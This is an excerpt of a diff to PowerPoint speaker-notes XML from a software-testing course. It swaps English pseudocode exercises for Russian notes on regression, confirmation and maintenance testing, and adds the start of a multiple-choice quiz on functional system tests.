-              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-                <a:latin typeface="+mn-lt"/>
-                <a:ea typeface="+mn-ea"/>
-                <a:cs typeface="+mn-cs"/>
-              </a:rPr>
-              <a:t>READ B</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
-              <a:t/>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-                <a:latin typeface="+mn-lt"/>
-                <a:ea typeface="+mn-ea"/>
-                <a:cs typeface="+mn-cs"/>
-              </a:rPr>
-              <a:t>READ C</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
-              <a:t/>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-                <a:latin typeface="+mn-lt"/>
-                <a:ea typeface="+mn-ea"/>
-                <a:cs typeface="+mn-cs"/>
-              </a:rPr>
-              <a:t>IF C&gt;A THEN</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
-              <a:t/>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
-              <a:t>   </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-                <a:latin typeface="+mn-lt"/>
-                <a:ea typeface="+mn-ea"/>
-                <a:cs typeface="+mn-cs"/>
-              </a:rPr>
-              <a:t>IF C&gt;B THEN</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" baseline="0" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-                <a:latin typeface="+mn-lt"/>
-                <a:ea typeface="+mn-ea"/>
-                <a:cs typeface="+mn-cs"/>
-              </a:rPr>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-                <a:latin typeface="+mn-lt"/>
-                <a:ea typeface="+mn-ea"/>
-                <a:cs typeface="+mn-cs"/>
-              </a:rPr>
-              <a:t>PRINT "C must be smaller than at least one number"</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
-              <a:t/>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
-              <a:t>      </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-                <a:latin typeface="+mn-lt"/>
-                <a:ea typeface="+mn-ea"/>
-                <a:cs typeface="+mn-cs"/>
-              </a:rPr>
-              <a:t>ELSE PRINT "Proceed to next stage“</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-                <a:latin typeface="+mn-lt"/>
-                <a:ea typeface="+mn-ea"/>
-                <a:cs typeface="+mn-cs"/>
-              </a:rPr>
-              <a:t>   ENDIF</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
-              <a:t/>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
-              <a:t>   </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-                <a:latin typeface="+mn-lt"/>
-                <a:ea typeface="+mn-ea"/>
-                <a:cs typeface="+mn-cs"/>
-              </a:rPr>
-              <a:t>ELSE</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" baseline="0" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-                <a:latin typeface="+mn-lt"/>
-                <a:ea typeface="+mn-ea"/>
-                <a:cs typeface="+mn-cs"/>
-              </a:rPr>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-                <a:latin typeface="+mn-lt"/>
-                <a:ea typeface="+mn-ea"/>
-                <a:cs typeface="+mn-cs"/>
-              </a:rPr>
-              <a:t>PRINT "B can be smaller than C"</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
-              <a:t/>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-                <a:latin typeface="+mn-lt"/>
-                <a:ea typeface="+mn-ea"/>
-                <a:cs typeface="+mn-cs"/>
-              </a:rPr>
-              <a:t>ENDIF</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
-              <a:t/>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-                <a:latin typeface="+mn-lt"/>
-                <a:ea typeface="+mn-ea"/>
-                <a:cs typeface="+mn-cs"/>
-              </a:rPr>
-              <a:t>A 3, 3.</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
-              <a:t/>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-                <a:latin typeface="+mn-lt"/>
-                <a:ea typeface="+mn-ea"/>
-                <a:cs typeface="+mn-cs"/>
-              </a:rPr>
-              <a:t>B 2, 3.</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
-              <a:t/>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-                <a:latin typeface="+mn-lt"/>
-                <a:ea typeface="+mn-ea"/>
-                <a:cs typeface="+mn-cs"/>
-              </a:rPr>
-              <a:t>C 2, 4.</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
-              <a:t/>
-            </a:r>
-            <a:br>
-              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
-            </a:br>
-            <a:r>
-              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
-                <a:solidFill>
-                  <a:schemeClr val="tx1"/>
-                </a:solidFill>
-                <a:latin typeface="+mn-lt"/>
-                <a:ea typeface="+mn-ea"/>
-                <a:cs typeface="+mn-cs"/>
-              </a:rPr>
-              <a:t>D 3, 2.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:endParaRPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
-              <a:solidFill>
-                <a:schemeClr val="tx1"/>
-              </a:solidFill>
-              <a:latin typeface="+mn-lt"/>
-              <a:ea typeface="+mn-ea"/>
-              <a:cs typeface="+mn-cs"/>
-            </a:endParaRPr>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t>После того, как дефект обнаружен и исправлен, программу необходимо перепроверить, чтобы убедиться, что исходный дефект успешно устранен. Это называется подтверждением. </a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="ru-RU" dirty="0" smtClean="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t>Отладка (локализация и исправление дефекта) относится к процессу разработки, а не тестирования. </a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="ru-RU" dirty="0" smtClean="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t>Регрессионное тестирование – это повторное тестирование уже протестированных программ после внесения в них изменений, чтобы обнаружить дефекты, внесенные или пропущенные  в результате этих действий. </a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="ru-RU" dirty="0" smtClean="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t>Эти дефекты могут быть как в проверяемом компоненте, так и в связанном или несвязанным с ним. </a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="ru-RU" dirty="0" smtClean="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t>Регрессионное тестирование выполняется, когда в программное обеспечение или его окружение вносятся изменения. </a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t>Глубина регрессионного тестирования оценивается риском пропуска  дефектов в программном обеспечении, которое работало ранее.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t>Тесты должны быть повторяемыми, если они должны использоваться для подтверждающего или регрессионного тестирования. </a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="ru-RU" dirty="0" smtClean="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t>Регрессионное тестирование может выполняться на всех уровнях тестирования и включает функциональное, нефункциональное и структурное тестирование. </a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="ru-RU" dirty="0" smtClean="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t>Регрессионные наборы тестов запускаются множество раз и меняются медленно, поэтому регрессионное тестирование является хорошим кандидатом на автоматизацию.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="ru-RU" dirty="0" smtClean="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t>Разновидности</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
+              <a:t> регрессионного тестирования:</a:t>
+            </a:r>
+            <a:endParaRPr lang="ru-RU" dirty="0" smtClean="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t>	Дымовое тестирование – поверхностная проверка того, что основные функции системы работают. </a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t>	Санитарное тестирование – проверка того, что какая-либо</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
+              <a:t> функция системы работает как следует.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
+              <a:t>	Регрессионное тестирование по дефектам, которые были исправлены в тестируемой версии ПО</a:t>
+            </a:r>
           </a:p>
           <a:p>
             <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
@@ -4432,6 +3399,434 @@
               <a:defRPr/>
             </a:pPr>
             <a:r>
+              <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
+              <a:t>	Регрессионное тестирование по дефектам, которые были исправлены в предыдущих версиях ПО</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
+              <a:t>	Тестирование побочного эффекта – проверка того, что исправление ошибок в определенной функциональности не повлекло за собой новых ошибок в работе данной функциональности.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
+              <a:t>	</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="ru-RU" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="4" name="Номер слайда 3"/>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldNum" sz="quarter" idx="10"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:fld id="{D75B0C5A-EE92-4E92-8F5B-10699705BBE2}" type="slidenum">
+              <a:rPr lang="en-US" smtClean="0"/>
+              <a:pPr/>
+              <a:t>10</a:t>
+            </a:fld>
+            <a:endParaRPr lang="en-US"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:notes>
+</file>
+
+<file path=ppt/notesSlides/notesSlide8.xml><?xml version="1.0" encoding="utf-8"?>
+<p:notes xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="2" name="Образ слайда 1"/>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldImg"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="3" name="Заметки 2"/>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="body" idx="1"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr>
+            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t>После установки система программного обеспечения обычно находится в эксплуатации в течение многих лет. В это время сама система, ее конфигурация или среда исполнения часто изменяются или расширяются. </a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t>Тестирование в период сопровождения выполняется на текущей ОС и может быть вызвано модификацией, переносом или прекращение эксплуатации данной системы. </a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="ru-RU" dirty="0" smtClean="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t>В зависимости от вносимых изменений, тестирование в период сопровождения может проводиться на любом из уровней или видов тестирования. Определение, каким образом внесенные изменения могут повлиять на систему, называется анализом влияния (</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
+              <a:t>impact analysis</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t>) и используется при определении объема регрессионных тестов.  </a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="en-US" smtClean="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" smtClean="0"/>
+              <a:t>Тестирование </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t>в период сопровождения затруднено, если технические требования являются устаревшими или отсутствуют вообще, либо </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
+              <a:t>тестировщики</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t> не обладают достаточными знаниями предметной области.</a:t>
+            </a:r>
+            <a:endParaRPr lang="ru-RU" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="4" name="Номер слайда 3"/>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldNum" sz="quarter" idx="10"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:fld id="{D75B0C5A-EE92-4E92-8F5B-10699705BBE2}" type="slidenum">
+              <a:rPr lang="en-US" smtClean="0"/>
+              <a:pPr/>
+              <a:t>11</a:t>
+            </a:fld>
+            <a:endParaRPr lang="en-US"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:notes>
+</file>
+
+<file path=ppt/notesSlides/notesSlide9.xml><?xml version="1.0" encoding="utf-8"?>
+<p:notes xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="2" name="Образ слайда 1"/>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldImg"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="3" name="Заметки 2"/>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="body" idx="1"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr>
+            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:rPr>
+              <a:t>TEST</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:rPr>
+              <a:t>3</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="ru-RU" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
+              <a:solidFill>
+                <a:schemeClr val="tx1"/>
+              </a:solidFill>
+              <a:latin typeface="+mn-lt"/>
+              <a:ea typeface="+mn-ea"/>
+              <a:cs typeface="+mn-cs"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:rPr>
+              <a:t>Question 1</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
+              <a:t/>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:rPr>
+              <a:t>Which of the following requirements would be tested by a functional system test?</a:t>
+            </a:r>
+            <a:endParaRPr lang="ru-RU" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
+              <a:solidFill>
+                <a:schemeClr val="tx1"/>
+              </a:solidFill>
+              <a:latin typeface="+mn-lt"/>
+              <a:ea typeface="+mn-ea"/>
+              <a:cs typeface="+mn-cs"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
+              <a:t/>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:rPr>
+              <a:t>A The system must be able to perform its functions for an average of 23 hours 50 </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" err="1" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:rPr>
+              <a:t>mins</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
+              <a:t/>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:rPr>
+              <a:t>per day.</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
+              <a:t/>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:rPr>
+              <a:t>B The system must perform adequately for up to 30 users.</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
+              <a:t/>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:rPr>
+              <a:t>C The system must allow a user to amend the address of a customer.</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
+              <a:t/>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:rPr>
+              <a:t>D The system must allow 12,000 new customers per year.</a:t>
+            </a:r>
+            <a:endParaRPr lang="ru-RU" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
+              <a:solidFill>
+                <a:schemeClr val="tx1"/>
+              </a:solidFill>
+              <a:latin typeface="+mn-lt"/>
+              <a:ea typeface="+mn-ea"/>
+              <a:cs typeface="+mn-cs"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
+              <a:solidFill>
+                <a:schemeClr val="tx1"/>
+              </a:solidFill>
+              <a:latin typeface="+mn-lt"/>
+              <a:ea typeface="+mn-ea"/>
+              <a:cs typeface="+mn-cs"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:r>
               <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                 <a:solidFill>
                   <a:schemeClr val="tx1"/>
@@ -4444,6 +3839,359 @@
             </a:r>
           </a:p>
           <a:p>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:rPr>
+              <a:t>Question 2</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
+              <a:t/>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
